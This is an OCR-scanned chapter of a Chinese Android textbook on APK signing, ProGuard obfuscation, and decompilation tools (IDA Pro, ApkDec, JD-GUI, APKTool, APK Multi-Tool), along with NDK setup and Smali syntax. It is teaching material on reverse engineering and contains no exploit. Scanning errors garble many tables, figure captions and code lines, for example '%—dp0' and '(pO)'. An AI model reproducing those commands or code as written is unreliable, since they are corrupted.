testkey.pk8 和 testkey.x5014.pem， 这 两 个 文件 位 于 Android 源码 的 build/target/product/security 目录 中 ， 然 后 
新 建 signapk.bat 文件 ， 具 体内 容 如 下 所 示 。 

java -jar "%—dp0signapk.jar" "%—dp0testkey.x5014.pem" "%—dp0testkey.pk8" %1 

signed.apk 

然后 依次 将 文件 signapk jar. signapk.bat, testkey.x5014.pem, testkey.pk8 放 到 同一 目录 ， 并 添加 到 系统 
PATH 环境 变量 中 ， 然 后 在 命令 提示 符 下 输入 如 下 命令 对 APK 文件 进行 签名 。 

signapk mmm.apk (我 们 的 APK 文件 ) 

这 样 签名 成 功 后 ， 会 在 同 目录 下 生成 一 个 名 为 signed.apk 的 文件 。 


122 防止 APK 文件 被 反 编 译 


ER 知识 点 讲解 :光盘 :视频 \ 知 识 点 \ 第 12 章 \ 防 止 APK 文件 被 反 编译 .avi 

为 了 防止 APK 文件 被 反 编译 ，Google 从 Android SDK 2.3 开始 , 在 android-sdk-windowstools/ 目 录 下 推 
出 了 proguard 文件 夹 。proguard 是 一 个 Java 代码 混淆 的 工具 , 通过 使 用 这 个 工具 , 即使 APK 文件 被 反 编 译 ， 
也 只 会 看 到 一 些 让 人 难 懂 的 代码 ， 从 而 达到 了 保护 版 权 代 码 的 作用 。 

打开 android-sdk-windows/tools/lib/proguard 目录 ， 在 其 中 保存 了 这 个 工具 的 完整 文件 内 容 。 在 proguard 
保护 机 制 下 ， 混 淆 中 保留 了 继承 自 Activity. Service. Application, BroadcastReceiver. ContentProvider 等 
基本 组 件 ， 以 及 一 些 com.android.vending.licensing.ILicensingService 的 内 容 ， 并 且 保 留 了 所 有 的 Native 变量 
名 及 类 名 ， 所 有 类 中 部 分 已 设 定 了 固定 参数 格式 的 构造 函数 和 枚 举 等 。 

为 了 防止 АРК 文件 被 反 编译 ， 可 以 设置 proguard.cfg 起 作用 ， 有 具体 方法 是 在 Eclipse 中 自动 生成 的 
default.properties 文件 中 加 上 如 下 代码 即 可 。 

proguard.config=proguard.cfg 

其 实在 Eclipse 自动 生成 的 default.properties 文件 中 ， 已 经 很 好 地 说 明了 proguard 的 功能 。 如 果 打 开本 
章 first 项 目 中 的 default.properties 文件 ， 会 看 到 如 下 内 容 。 

# This file is automatically generated by Android Tools. 

# Do not modify this file -- YOUR CHANGES WILL BE ERASED! 

# 

# This file must be checked in Version Control Systems. 

# 

# To customize properties used by the Ant build system edit 

# "ant.properties", and override values to adapt the script to your 

# project structure. 

# 

# To enable ProGuard to shrink and obfuscate your code, uncomment this (available properties: sdk.dir, 

user.home): 

#proguard.config=${sdk. dir}/tools/proguard/proguard-android.txt:proguard-project.txt 


# Indicates whether an apk should be generated for each density. 

split.density-false 

# Project target. 

target=android-19 

在 上 述 代 码 中 ， 只 需 将 加 粗 斜 体 代码 的 注释 去 掉 变 为 可 用 代码 ， 即 可 实现 保护 自己 的 源码 被 反 编译 。 
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这 样 当 正常 编译 并 签名 一 个 Android 应 用 项 目 后 , 即 可 防止 代码 被 反 编译 了 。 反 编译 后 会 得 到 类 似 于 图 12-9 
所 示 的 截图 效果 ， 十 分 难以 看 懂 并 理解 。 
5-8 zy.MyProguard 
8-10 MyProguard 
-© MyProguard 


|package zy.MyProguard; 


ө onCreate(Bundle) : void [public final class a 
日 -区 t 
ag public String a; 
aid А public int b; 
° a: String public float c; 
° b:int ) 
9 c:float 


图 12-9 反 编 译 后 的 结果 难以 看 懂 


12.3 IDA Pro 反 编 译 工 具 详 解 


бы 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 12 章 \IDA Pro 反 编译 工具 详解 .avi 
IDA Pro 是 交互 式 反 汇 编 器 专业 版 CInteractive Disassembler Professional) 的 缩写 ， 是 总 部 位 于 比利时 公司 
Hex-Rayd 的 一 款 产 品 。 本 节 将 详细 讲解 使 用 IDA Pro 工具 的 基本 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


12.3.1 IDA Pro 介绍 


IDA Pro 简称 IDA (Interactive Disassembler) ， 是 一 个 世界 项 级 的 交互 式 反 汇编 工具 ， 有 两 种 可 用 版 本 ， 
即 标准 版 和 高 级 版 。 标 准 版 (Standard) 支持 二 十 多 种 处 理 器 ， 高 级 版 Advanced) 支持 五 十 多 种 处 理 器 。 
IDA Pro 的 最 初创 建 者 是 一 位 编程 天 才 , IDA Pro 在 诞生 十 年 前 , 还 是 一 个 基于 控制 台 的 MS-DOS 应 用 程序 ， 
这 一 点 有 助 于 开发 者 理解 IDA 用 户 界 面 的 本 质 。 其 实 IDA. Pro 是 一 种 递归 下 降 反 汇编 器 工具 ， 为 了 提高 北 
归 下 降 过 程 的 效率 ，IDA Pro 在 区 分 数据 和 代码 的 同时 还 是 无 法 确定 这 些 数据 的 类 型 。 虽 然 在 IDA Pro 中 看 
到 的 是 汇编 语言 形式 的 代码 ， 但 是 IDA Pro 的 主要 目标 之 一 是 呈现 出 尽 可 能 接近 源 代码 的 代码 。 另 外 ，IDA 
Pro 不 仅 使 用 数据 类 型 信息 ， 而 且 还 可 以 通过 派生 变量 和 函数 名 称 来 注释 生成 的 反 汇编 代码 。 通 过 使 用 这 些 
注释 ， 不 但 可 以 将 原始 十 六 进 制 代码 的 数量 减 到 最 少 ， 而 且 增 加 了 向 用 户 提供 的 符号 化 信息 的 数量 。IDA 
不 但 支持 x86， 也 支持 ARM 平台 。 

IDA Pro 是 一 款 收费 软件 ， 不 存在 任何 注册 机 、 注 册 码 或 破解 版 ， 除 了 测试 版 和 一 个 5.0 的 免费 版 外 ， 
网 络 上 能 下 载 的 都 是 包含 用 户 许可 证 的 正版 ， 因 为 所 有 的 安装 包 都 是 OEM 版 ， 所 以 IDA 官网 不 提供 软件 
下 载 ， 并 且 软 件 也 没有 注册 的 选项 。 


12.3.2 ”常用 的 快捷 键 


在 第 三 方 工 具 IDA Pro 应 用 中 ， 常 用 的 快捷 键 如 表 12-1 所 示 。 
表 12-1 IDA Pro 快捷 键 说 明 


快 捷 键 ў 能 + Ж 
€ 转换 为 代码 一 般 在 IDA 无 法 识别 代码 时 使 用 这 两 个 功能 整理 代码 


Android £ €? 4 o Gic 


жж 
om sg ош 
D 
A 
N š s 
— 方便 记忆 ， 避 免 重复 分 析 
R 把 立即 值 转换 为 字符 
H 把 立即 值 转换 为 十 进 制 " 
Q 把 立即 值 转换 为 十 六 进 制 | 便于 分 析 立 即 值 
B 把 立即 值 转换 为 二 进 制 
G 跳 转 到 指定 地 址 
x 交叉 参考 便于 查找 API 或 变量 的 引用 
SHIFT+/ 计算 器 
ALT+ENTER 地 址 
— 这 4 个 功能 都 是 方便 在 不 同 函数 之 问 分析 (尤其 是 多 层次 的 调用 )， 
ALD 具体 使 用 看 个 人 喜好 
ESC 
CTRL+ENTER 


12.4 其 他 常用 的 反 编 译 工 具 


GE 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 12 章 \ 其 他 常用 的 反 编译 工具 .avi 
除了 IDA Pro 开发 工具 之 外 ， 在 市 面 中 还 有 很 多 其 他 的 常用 反 编 译 工 具 。 在 本 节 的 内 容 中 ， 将 为 读者 一 
-讲解 这 些 常 用 反 编 译 工 具 的 基本 知识 。 


12.4.1 ApkDec 介绍 


ApkDec 是 一 款 针对 Android 推出 的 免费 的 绿色 APK 反 编 译 工具 ， 由 Android 开发 者 社区 juapk 开发 。 


读者 可 以 从 网 络 中 获取 ApkDec 工具 包 ， 下 载 并 解压 缩 后 的 截图 效果 如 图 12-10 所 示 。 


13/3/30 21:44 

13/3/30 21:48 — 
L id-eni. cfg 2014/4/14 17:56 cre 文件 1 
(fp jògui. exe 2009/9/28 11:44 应 用 程序 629 Kb 
Ll readne. txt 2013/3/30 21:58 ”文本 文档 1 


图 12-10 ApkDec 截图 效果 


笔者 使 用 的 是 ApkDec-Release-0.1 版 本 ,双击 ApkDec-Release-0.1.exe 运行 ApkDec, 运行 界面 如 图 12-11 


所 示 。 


从 图 12-11 所 示 的 界面 可 知 ，ApkDec 具有 如 下 3 个 功能 。 
(1) 选中 all 单 选 按钮 可 以 编译 全 部 内 容 ， 包 括 JAR、XML 及 其 他 资源 文件 。 
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(2) 选中 jar 单 选 按钮 只 会 反 编译 并 打 成 JAR 包 。 
G) 反 编译 后 可 以 运行 jd-gui.exe 来 查看 源码 。 


EX AmE 
如 HEec 是 一 车 免 费 的 绿色 KE 编译 工具 for алоіа 


[EE 
[0 aR 


Ca Ce 

aD 
1.888 ll SERIE. =a 、 及 其 他 资源 文件 
2388 je RRR 
3 反 编 译 后 你 可 以 使 用 jd eni ec SRS 
sndroid 开 发 者 社区 : wre, junk con 00: 137824028 


жыш: 


图 12-11 ApkDec 运行 界面 
12.4.2 jdgui.exe 介绍 


JD-GUI 是 一 个 独立 图 形 界面 的 Java 源 代码 .class 文件 反 编译 工具 ， 可 以 浏览 重建 的 源 代码 。JD-GUI 是 
使 用 C++ 语言 开发 的 ， 主 要 功能 如 下 所 示 。 

(1) 支持 众多 Java 编译 器 的 反 编 译 。 

(2) 支持 对 整个 JAR 文件 进行 反 编 译 ， 并 且 本 源 代 码 可 直接 单 击 进行 相关 代码 的 跳 转 。 

JD-GUI 是 免费 的 ， 非 商业 用 途 ， 这 意味 着 JD-GUI 不 得 包含 或 嵌入 到 商业 软件 产品 。 不 过 ， 这 个 项 目 
可 以 被 自由 地 用 于 开发 个 人 商业 项 目的 过 程 中 。JD-GUI 是 一 个 独立 显示 .class 文件 Java 源 代码 的 图 形 用 户 
界面 工具 ， 可 以 使 用 JD-GUI 浏览 和 重建 源 代码 的 即时 访问 方法 和 字段 ， 以 代码 高 度 方式 来 显示 反 编译 的 代 
人 码 ，JD-GUI 的 运行 界面 如 图 12-12 所 示 。 


ryz ow 
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import. javax.persistence. Table: 
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Find: [E I]? Wet i; Prevous FO Case segne x 


12-12. JD-GUI 的 运行 界面 


М Android sse jo REC 
124.3 APKTool 详解 


APKTool 是 Google 提供 的 АРК 编译 工具 , 能够 反 编译 及 回 编译 АРК 文件 ， 同 时 安装 反 编译 系统 APK 
所 需要 的 framework-res 框架 ,清理 上 次 反 编 译文 件 夹 等 功能 。APKTool 需要 Java 运行 环境 支持 ， 其 官方 地 
址 是 http://code.google.com/p/android-apktool/， 如 图 12-13 所 示 。 
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图 12-13 APKTool 的 官方 地 址 


官方 提供 了 针对 Linux, Windows 和 Mac 等 平台 的 版 本 ， 单 击 左 侧 Windows 版 的 最 新 下 载 超 链接 
apktool-install-windows-r05-ibot.tar.bz2, Ж] 1 12-14 所 示 的 下 载 界面 。 


Wit android-apktool 


A tool for reverse engineering Android apk files 


ProjectHome | Downloads | Wiki Issues Source 


Search | Current downloads 可 for Search 


Download: apktool dependencies and helper script for windows 


122 people starred this download 

Uploaded by: connortumbleson i: 

Mates GAA Fis: + J apktool-install-windows-r05-ibot.tar.t 
Uploaded: Dec 23, 2012 Description: 

Dowsoads: 205/91 SHA1 Checksum: 8baaf12ffdf79d703e40edfóeb4abaa39ecO62fa What's this? 
Featured 

OpSys-Windows 

Type-Archive 


12-14 APKTool 的 下 载 界面 
单 击 apktool-install-windows-r05-ibot.tar.bz2 超 链 接 开 始 下 载 , 解压 缩 下 载 文件 后 得 到 如 图 12-15 所 示 的 文件 。 
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E] aapt. exe 2012/12/6 11:44 ”应 用 程序 834 KB 
[S] apktool. bat 2012/12/23 23:39 Windows 批 处 理 ... 1 KB 


12-15 ”解压 缩 APKTool 压缩 包 后 得 到 的 文件 
在 使 用 APKTool 工具 之 前 ， 需 要 先 搭建 运行 Java 的 环境 并 掌握 常用 的 编译 命令 。 
1. 环境 配置 


(1) 安装 Java。 

(2) 完成 安装 后 在 桌面 “我 的 电脑 ”图 标 上 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ， 选 择 “ 高 
级 ”选项 卡 ， 单 击 “ 环 境 变 量 ” 按 钮 ， 在 “环境 变量 ”对 话 框 中 单 击 “ 新 建 ” 按 钮 ， 创 建 两 个 系统 变量 。 

О JAVA HOME 变量 值 ，C:\Program Files\Javayre7， 该 目录 为 Java 安 装 目 录 。 

O CLASSPATH 变 量 值 :安装 目录 \lib\dt.jar; 安 装 目 录 \lib\tools.jar;.。 注 意 ， 最 后 面 有 一 个 “.”。 

(3) 编辑 一 个 系统 变量 : Path 变量 ， 在 它 的 变量 值 最 后 面 加 上 “; 安 装 目 录 \bin”， 在 此 一 定 要 注意 前 
面 有 一 个 分 号 。 

(4) 开始 测试 ， 运 行 CMD， 输 入 java -version， 然 后 按 Enter 键 ， 如 果 出 现 JDK 版 本 ， 则 说 明 Java 运 
行 环境 已 经 安装 成 功 了 。 


2. 常用 的 命令 


(1) decode 
该 命令 用 于 反 编 译 APK 文件 ， 一 般 用 法 如 下 。 
apktool d <file.apk> <dir> 
O <file.apk>: 表示 要 反 编 译 的 APK 文 件 的 路 径 ， 最 好 写 绝 对 路 径 ， 例 如 C:\MusicPlayer.apk。 
O «die: 代表 了 反 编 译 后 的 文件 的 存储 位 置 ， 例 如 C:\MusicPlayer。 
如 果 给 定 的 <dir> 已 经 在 在， 那么 输入 完 该 命令 后 会 输出 提示 ， 并 且 无 法 执行 ， 需 要 重新 修改 命令 ， 加 
入 如 下 -f 指 令 。 
apktool d -f <file.apk> <dir> 
这 样 就 会 强行 获 盖 已 经 存在 的 文件 。 
(2) build 
该 命令 用 于 编译 修改 好 的 文件 ， 一 般 用 法 如 下 。 
apktool b <dir> 
这 里 的 <dir> 就 是 刚才 反 编 译 时 输入 的 <dir> (如 C:WusicPlayer) ， 如 果 在 输入 这 行 命令 后 一 切 正常 ， 
则 会 发 现 C:\MusicPlayer 内 多 了 两 个 文件 夹 build 和 dist， 其 中 分 别 存储 着 编译 过 程 中 逐个 编译 的 文件 以 及 
最 终 打 包 的 АРК 文件 。 
(3) install 
install-framework 命令 用 于 为 APKTool 安装 特定 的 framework-res.apk 文件 ， 以 方便 反 编译 一 些 与 ROM 
相互 依赖 的 APK 文件 。 


12.4.4 APK Multi-Tool 详解 
APK Multi-Tool 是 APK Manager 的 升级 版 , 是 一 个 强大 的 APK 反 编 译 工具 , 在 此 工具 中 集成 了 反 编 译 、 


编译 和 签名 等 选项 。APK Multi-Tool 是 一 个 比较 方便 的 适合 非 开 发 者 的 小 工具 ， 可 以 对 一 些 APK 程序 做 自 
己 喜 欢 的 修改 。 笔 者 撰写 本 书 时 ，APK Multi-Tool 官方 的 最 新 版 是 APK Multi-Tool 1.0.3， 其 官方 网 站 是 


http:/apkmultitoolcom， 如 图 12-16 所 示 。 
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图 12-16 АРК Multi-Tool 的 官方 地 址 


要 正常 使 用 APK Multi-Tool， 开 发 者 的 机 器 必须 安装 如 下 工具 环境 。 

О JDK (Java Development Kit) 

口 Adb (Android SDK tools And platform-tools ) 

有 关上 述 环境 的 配置 过 程 ， 在 本 书 前 面 讲解 搭建 Android 应 用 开发 环境 的 内 容 中 进行 了 讲解 。 完 成 了 
JDK 和 SDK 的 安装 和 配置 工作 后 ， 就 可 以 开始 使 用 APK Multi-Tool 反 编译 APK 程序 了 。 

如 果 使 用 的 是 官方 原版 APK Multi-Tool， 在 完成 了 JDK 和 SDK 的 安装 和 配置 之 后 ， 还 必须 把 Android 
SDK 安装 目录 android-sdk\platform-tools 文件 夹 下 的 3 个 文件 复制 到 АРК Multi-Tool 目录 АРК 
Multi-Tool\platform-tools 文件 夹 下 ， 如 图 12-17 所 示 ， 和 否则 程序 不 能 正常 运行 。 

APK 通过 使 用 APK Multi-Tool 工具 先 解压 APK 文件 ， 然 后 对 其 进行 编辑 并 打包 ， 最 后 签名 ， 这 
样 就 可 以 安装 自己 修改 过 的 APK 文件 了 。 安 装 APK Multi-Tool 后 的 目录 结构 如 图 12-18 所 示 。 


B docs 2012/5/30 13:58 文件 夹 

В place-apk-here-for-nodding 2013/5/16 1:03 ян 

ЎЗ place-apk-here-for-signing 2013/1/10 19:43 文件 夹 

ЎЗ place-apk-here-to-batch-optimirze 2013/1/10 19:43 文件 夹 

1. place-ogg-here 2013/1/10 19:43 bcd 

В platform-tools 2012/5/30 13:58 文件 夹 

Fa a exe Й projects 2013/5/16 0:54 文件 夹 
国 AabyinApi.al Ji thener 2012/5/30 13:58 ЖЖ 
图 AabyinUsbApi. dl Ь tools 2012/5/30 13:58 ХЖ 

图 12-17 android-sdk\platform-tools 文件 夹 下 的 3 个 文件 图 12-18 ”安装 APK Multi-Tool 后 的 目录 结构 


各 个 文件 夹 目 录 的 具体 说 明 如 下 所 示 。 

keep: 保存 修改 前 文件 ， 在 使 用 后 才 生成 这 个 目录 。 

projects: 包含 反 编 译 出 来 的 文件 ， 在 使 用 后 才 生 成 这 个 目录 。 

place-apk-here-for-modding: 存放 待 修 改 的 文件 〈 文 件 名 一 定 不 要 有 空格 ， 最 好 用 英文 命名 ) 。 
place-apk-here-for-signing: 存放 待 签名 的 文件 。 

place-apk-here-to-batch-optimize: 存放 批量 处 理 的 文件 〈 可 以 多 个 ) 。 

place-ogg-here: 存放 待 OGG 优 化 的 文件 。 
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12.5 Android NDK 


E 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 12 章 \Android NDK.avi 

当前 Android 平台 下 的 软件 应 用 复杂 多 变 ， 仅 使 用 Android SDK 通过 Java 语言 编写 程序 已 经 不 能 满足 
开发 者 了 ， 例 如 ， 音 频 、 视 频 播放 软件 解码 器 的 编写 就 涉及 CPU 的 高 性 能 运算 ， 其 他 平台 开发 的 游戏 如 采 
用 C、C++ 编 写 ， 则 因为 涉及 到 时 移植 而 可 能 面临 重 写 所 有 代码 ; 传统 的 Java 语言 编写 的 程序 容易 遭 到 逆向 
破解 ， 因 此 需要 一 种 新 的 代码 保护 手段 来 防御 攻击 等 ， 这 些 显著 的 需求 都 涌现 了 出 来 ， 为 了 解决 这 些 问题 ， 
Google 和 凭借 Java 语 言 的 JNI 特 性 为 开发 者 提供 了 Android МОК. Android МОК Z Google 提供 的 开发 Android 
原生 程序 的 工具 包 。 如 今 越 来 越 多 的 软件 与 病毒 采用 了 基于 Android NDK 动态 库 的 调用 技术 ， 隐 藏 了 程序 
在 实现 上 的 很 多 细节 ,掌握 Android МОК 程序 的 分 析 技 术 也 成 为 了 分 析 人 员 必 备 的 技能 。 在 本 节 的 内 容 中 ， 
将 简要 讲解 Android NDK 的 基本 知识 。 


12.5.1 Android NDK 介绍 


Android МОК 译 为 “ 安 卓 原生 开发 套件 ”， 是 一 款 强 大 的 工具 ， 可 以 将 原生 C、C++ 代 码 的 强大 功能 和 
Android 应 用 的 图 形 界面 结合 在 一 起 , 解决 Android 软件 的 跨 平 台 问 题 。 通 过 使 用 Android МОК Т.Д, 一些 
应 用 程序 能 直接 通过 INI 调用 与 CPU 进行 交互 ， 从 而 提升 Android 程序 的 性 能 。 同 时 ，Android NDK 能 够 
将 程序 的 核心 功能 封装 进 基于 “原生 开发 套件 ”的 模板 中 ， 从 而 大 大 提高 了 软件 的 安全 性 。 

Android NDK 从 R8 版 本 开始 ， 支 持 生成 X86、MIPS、ARM 这 3 种 架构 的 原生 程序 。 原 生 程序 的 优化 
属于 GCC 编译 器 控制 的 部 分 ， 未 经 过 优化 的 代码 与 经 过 优化 的 代码 有 很 大 区 别 ， 在 实际 逆向 分 析 中 大 多 遇 
见 的 是 优化 过 程 的 代码 。GCC 编译 优化 通过 -O 选项 提供 ， 有 0、1、2、3、s 共 5 个 优化 等 级 。 具 体 说 明 如 
下 所 示 。 

Q 等 级 0: 不 优化 。 在 makefile 文 件 中 未 指定 -0 选项 时 默认 不 优化 。 

а 等 级 1: 开启 部 分 优化 。 该 模式 下 ， 编 译 会 尝试 减少 代码 体积 和 代码 运行 时 间 ， 但 是 并 不 执行 会 花 

费 大 量 时间 的 优化 操作 。 
а 等 级 2: 比 等 级 1 更 进一步 优化 ， 在 该 模式 下 ， 并 不 执行 循环 展开 和 函数 内 联 优化 操作 ， 与 -O1 比 较 ， 
该 模式 会 花费 更 多 的 编译 时 间 ， 并 生成 性 能 更 好 的 代码 。 

а 等 级 3: 包括 等 级 2 所 有 的 优化 ， 并 开启 循环 展开 和 函数 内 联 优化 操作 。 

О EAs: 针对 程序 大 小 进行 优化 ， 该 模式 下 会 执行 -02 等 级 中 除了 会 增加 程序 空间 的 所 有 优化 参数 ， 

同时 增加 了 一 些 优化 程序 空间 的 选项 。 

编译 器 优化 的 选项 非常 多 ， 此 处 不 去 深究 具体 每 个 等 级 的 优化 选项 ， 只 通过 使 用 不 同等 级 优化 来 比较 
程序 的 大 小 及 代码 差异 。 


12.5.2 ”使 用 Апагоіа NDK 


Android NDK 的 下 载 地 址 为 : 

http://developer.android.com/sdk/ndk/index.html 

下 载 界面 如 图 12-19 所 示 。 
(1) 目前 Android NDK 的 最 新 版 本 为 R9， 根 据 自 己 机 器 的 配置 ， 选 择 一 个 将 要 下 载 的 版 本 进行 下 载 。 
(2) 下 载 后 将 压缩 包 解 压 到 硬盘 任意 位 置 ， 例 如 D 盘 的 根 目录 ， 如 图 12-20 所 示 。 
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еее 


Platform | Package 

Windows 32-bit android-ndk-r9d-windows-x86 zip 

Windows 64-bit android-ndk-r9d-windows- 
x86 6421р 

MacOSX32-bit ^ android-ndk-r9d-darwin- 
x86 tarbz2 

Mac OS X 64-bit — android-ndk-r9d-darwin- 
x86_64.tar-bz2 

Linux 32-bit android-ndk-r9d-linux-x86 tar bz2 

(x86) 

Linux 64-bit android-ndk-rd-linux- 

(x86) x86_64 tar bz2 

Additional Package 

Download 

STLdebuginfo — android-ndk-r9d-cxx-stl-libs-with- 
debug-info zip. 


Size (Bytes) 
491440074 
520997454 


393866116 


400339614 


405218267 


412879983 


Size (Bytes) 


104947363 


MD5 Checksum 
b16516b611841a075685a10c59d6d7a2 
Bcd244fc799d0e6e59d65a59a8692588 


ee6544bd8093c79ea08c2e3a6ffe3573 


c914164b1231c574dbe40debef7048be 


6c1d7d99f55f0c17ecbcf81ba0eb201f 


c7c775ab3342965408d20fd18e71aa45 


MD5 Checksum 


906c8d88e0f02295c3bfe6b8e98a1a35 


图 12-19 Android NDK 的 下 载 界面 


TF, v SO (D) » android-ndk-r8b » 


mepe REO RRO FEHR 
ze E 
Ji build 

Ji docs 

Ji platforms 

Ji prebuit 

Ji samples 

di sources 

Ji tests 

Ji toolchains 

|| documentation 
LÌ GNUmakefile 

Dj ndk-build 

国 ndk-build 
Dndk-gdb 

回 ndk-stack 

日 REApME 

О RELEASE 


修改 日 期 


2012/7/31 14:25 
2012/7/31 1425 
2012/7/31 1425 
2012/7/31 14:25 
2012/7/31 14:25 
2012/7/31 14:25 
2012/7/31 1425 
2012/7/31 14:25 
2012/6/24 17:45 
2012/6/24 17:45 
2012/7/10 3:43 
2012/6/30 1:35 
2012/7/4 1:01 

2012/7/3 14:04 
2012/6/24 17:45 
2012/7/14 7:00 


m 大 小 

xum 

xum 

xam 

xem 

хе 

xem 

文件 交 

x= 

360seURL 1кв 
文件 2 KB 
文件 6KB 
Windows 22804 1 KB 
文件 22KB 
вет 164 КВ 
文本 文档 2 KB 
文本 文档 1K8 


图 12-20 保存 解压 的 文件 
(3) 如 果 读 者 的 机 器 是 Windows 环境 ， 则 需要 安装 Cygwin。 


(4) 配置 NDK 路 径 设置 ， 可 以 在 Cygwin 中 通过 vim 进行 修改 ， 也 可 以 在 Cygwin 安装 目录 中 修改 


“homev< 你 的 用 户 名 >\bash_profile”， 最 后 添加 环境 变量 。 


NDK=/cygdrive/d/Android-ndk-r9b 
export NDK 


其 中 NDK=/cygdrive/< 你 的 盘 符 >/<Android пік 目录 > , NDK 可 以 随意 命名 。 
(5) 重启 Cygwin， 输 入 如 下 命令 可 以 进入 NDK 对 应 目录 。 


cd $NDK 


(6) 如 果 读 者 的 机 器 是 Linux 系统 ， 则 可 以 直接 跳 过 上 面 的 步骤 (3) 一 步骤 (5) ， 新 建 环境 变量 
ANDROID NDK， 设 置 值 为 Di\android-ndk-r9， 然 后 将 ANDROID МОК 添加 到 PATH 环境 变量 中 。 到 此 


为 止 ，Android NDK 就 算 安装 完成 了 。 


(7) 接 下 来 开始 测试 配置 是 否 正确 ， 在 CMD 窗口 中 进入 目录 D:vandroid-ndk-r9\samples\hello-jini， 输 


入 如 下 命令 编译 Android МОК 中 自 带 的 hello-jni 工程 。 


ndk-build 


如 果 出 现 如 图 12-21 所 示 的 结果 ， 则 说 明 Android МОК 安装 成 功 。 


e. 


вре 常用 的 反 编译 工 


(8) 编译 完成 后 会 在 项 目的 libs/armeabi 目录 下 生成 对 应 的 .so 静态 目标 库 文件 ， 如 图 12-22 所 示 。 


aR auem 


£5 
| gdb.setup 
|| gdbserver 
1) lilbhello-jni.so 
12-21 成 功 安装 Android NDK 12-22 ”生成 的 “.so” 文 件 


(9) 可 以 将 得 到 的 *.so 静态 目标 库 文件 导入 到 Android (Eclipse) 工程 中 使 用 。NDK 编程 并 非 一 定 要 把 
这 个 目标 库 导入 Android 工程 项 目 使 用 , 除了 本 步骤 描述 的 使 用 方法 之 外 , 还 有 Android 源码 直接 修改 、 编 译 ， 
然后 烧 录 到 测试 机 的 开发 方式 ， 这 样 可 以 实现 应 用 程序 默认 安装 、 权 限 开机 提升 等 更 “彻底 ”的 功能 。 


SER: 本 步骤 演示 属于 NDK 目 标 库 +Android APK 样 式 ， 此 外 还 有 Android 源 码 直 接 开 发 、 直 接 编译 方式 
( 确切 一 点 已 经 淡化 Android 所 谓 的 工程 概念 了 ， 当 然 源 码 开发 目前 似乎 还 无 法 直接 在 Windows 
下 进行 ， 必 须 使 用 Linux 家 族 系 统 ) 。 


在 接 下 来 的 内 容 中 ， 开 始 讲 解 在 Android (Eclipse) 工程 中 使 用 NDK 的 流程 。 
(1) 在 Eclipse 中 新 建 一 个 工程 ， 例 如 HelloJni， 程 序 文件 HelloJni.java 的 具体 实现 代码 ， 可 以 参考 
NDK 中 如 下 对 应 sample 目录 下 的 演示 代码 的 调用 方法 。 
android-ndk-r9b\samples\hello-jni\tests\src\com\example\HelloJniTest 
(2) 将 NDK 编译 项 目 目录 下 的 jni 和 libs 文件 夹 复 制 到 新 建 工 程 目 录 下 。 这 两 个 文件 夹 必须 和 工程 中 
的 src 和 res 文件 在 同一 目录 下 。 
(3) 进入 Eclipse 中 刷新 工程 ， 会 看 到 多 出 两 个 文件 夹 。 
(4) 此 时 运行 Eclipse 项 目 ， 可 以 在 虚拟 机 上 看 到 演示 文件 hello-jni.c 输出 的 字符 串 。 
(5) 以 后 可 以 尝试 修改 库 源 程序 或 项 目 中 的 Java 程序 。 


12.6 Smali 语法 介绍 


Фи 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 12 章 \Smali 语法 介绍 .avi 

Smali 语言 其 实 就 是 Davlik 的 寄存 器 语言 ，Smali 语言 就 是 Android 的 应 用 程序 。 当 .apk 格式 的 文件 被 
apktool 等 反 编译 工具 处 理 后 ， 会 得 到 一 个 smali 文件 夹 ， 里 面 都 是 以 .smali 结尾 的 文件 。 在 本 节 的 内 容 中 ， 
将 详细 讲解 Smali 语言 的 基本 语法 知识 。 


12.6.1 Smali 简介 


例如 ， 官 方 实例 HelloWorldApp 通过 Apktool 反 编 译 出 来 的 目录 如 图 12-23 所 示 。 


Е 1223 反 编译 出 的 内 容 


1 Android 系统 安全 和 反 编 译 实战 


smali 文件 夹 中 的 目录 如 图 12-24 所 示 。 


+R z am BuildConfig. saali 
BG алле, aja) m. 
& © build ых 
О as N " 
2 QN Bia sai 
a Oru i 
im |i. ар" 
a С) androia = = 
a coo — кин SY RSarevable. smali 
"TA "lm vn B |ie, yy 
Ө C2 amin - - 
SEE AN sisi mali Lh helorerl sevhet 
® © yonerhone BUS oe ДР" 
用 >Y dex? їағ- П T-SWAPSWIT = — 


图 12-24 smali 文件 夹 里 面 的 目录 


先 打 开 一 个 主 类 HelloWorldAppActivity.smali 文件 ， 来 浏览 一 下 里 面 的 语言 ， 再 看 一 下 smali 的 语法 规则 。 
.class public Lcom/cn/daming/activity/HelloWorIdAppActivity; 

.super Landroid/app/Activity; 

.source "HelloWorldAppActivity.java" 


# instance fields 
field private mTextView:Landroid/widget/TextView; 


# direct methods 
.method public constructor <init>()V 
locals 0 


.prologue 
line 7 
invoke-direct (pO), Landroid/app/Activity;-><init>()V 


return-void 


.end method 


# virtual methods 

.method public onCreate(Landroid/os/Bundle;)V 
locals 2 
.parameter "savedInstanceState" 


.prologue 
Jine 12 
invoke-super (pO, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V 


line 13 
const/high16 vO, 0x7f03 


invoke-virtual (pO, v0), Lcom/cn/daming/activity/HelloWorldAppActivity;->setC ontentView(I)V 


line 14 
const/high16 vO, 0x7f05 


invoke-virtual (pO, v0), Lcom/cn/daming/activity/HelloWorldAppActivity;->findViewByld(|)Landroid/view/View; 
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move-result-object м0 
check-cast v0, Landroid/widget/TextView; 
iput-object vO, p0, Lcom/cn/daming/activity/HelloWorldAppActivity;-» mTextView:Landroid/widget/TextView; 


line 15 
iget-object vO, ро, Lcom/cn/daming/activity/HelloWorldAppActivity;-» mTextView:Landroid/widget/TextView; 


const/high16 v1, Ox7f04 
invoke-virtual (v0, v1}, Landroid/widget/TextView;->setText(I)V 


line 16 
return-void 
.end method 
ЕЖ Smali 语言 对 应 的 Java 类 是 HelloWorldAppActivity， 文 件 HelloWorldAppActivity java 的 具体 实现 
代码 如 下 所 示 。 
package com.cn.daming.activity; 


import android.app.Activity; 
import android.os.Bundle; 
import android.widget.TextView; 


public class HelloWorIdAppActivity extends Activity ( 
private TextView mTextView; 

/** Called when the activity is first created. */ 

@Override 

public void onCreate(Bundle savedinstanceState) { 
super.onCreate(savedInstanceState); 
setContentView(R.layout.main); 
